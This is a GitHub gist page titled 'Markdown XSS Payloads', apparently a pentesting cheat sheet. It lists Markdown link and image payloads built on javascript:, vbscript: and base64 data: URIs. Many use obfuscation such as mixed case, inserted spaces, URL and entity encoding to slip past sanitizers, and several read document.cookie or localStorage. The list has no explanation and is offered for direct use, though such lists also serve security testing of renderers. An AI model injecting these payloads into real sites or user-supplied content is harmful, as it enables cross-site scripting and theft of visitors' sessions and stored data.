Forked from tamzidr/gist:ec225b4b9bc76971e41541cf32e319fc
Created
July 24, 2025 11:20
-
-
Save mrrootsec/3c99eecd740983774738950c74ada109 to your computer and use it in GitHub Desktop.
Markdown XSS Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Links: | |
| [Basic](javascript:alert('Basic')) | |
| [Local Storage](javascript:alert(JSON.stringify(localStorage))) | |
| [CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive')) | |
| [URL](javascript://www.google.com%0Aalert('URL')) | |
| [In Quotes]('javascript:alert("InQuotes")') | |
| Images: | |
| ) | |
| ) | |
| Fuzzing Techniques: | |
| [XSS](javascript:prompt(document.cookie)) | |
| [XSS](j a v a s c r i p t:prompt(document.cookie)) | |
| [XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) | |
| [XSS](javascript:alert('XSS')) | |
| [XSS]: (javascript:prompt(document.cookie)) | |
| [XSS](javascript:window.onerror=alert;throw%20document.cookie) | |
| [XSS](javascript://%0d%0aprompt(1)) | |
| [XSS](javascript://%0d%0aprompt(1);com) | |
| [XSS](vbscript:alert(document.domain)) | |
| [XSS](javascript:this;alert(1)) | |
| [XSS](javascript:this;alert(1)) | |
| [XSS](javascript:this;alert(1)) | |
| [XSS](Javascript:alert(1)) | |
| [XSS](Javas%26%2399;ript:alert(1)) | |
| [XSS](javascript:alert(1)) | |
| [XSS](javascript:confirm(1)) | |
| [XSS](javascript://www.google.com%0Aprompt(1)) | |
| [XSS](javascript://%0d%0aconfirm(1);com) | |
| [XSS](javascript:window.onerror=confirm;throw%201) | |
| ) | |
|  | |
|  | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment